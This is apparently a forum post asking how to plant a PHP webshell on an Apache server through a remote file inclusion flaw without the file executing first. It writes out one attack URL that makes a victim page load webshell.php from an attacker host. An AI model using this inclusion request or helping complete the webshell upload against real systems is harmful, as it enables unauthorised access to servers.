Hello guys,
Anyone can tell me how to download a webshell.php file on an apache server through a remote file inclusion vulnerability without executing the php file ? I can initiate a remote file inclusion coming like this http://victim_machine/file.php?src=http://attack_machine/webshell.php but the server apache execute the webshell.php file before dowloading it. So when I try to read it on the victim machine there is nothing inside... Thank you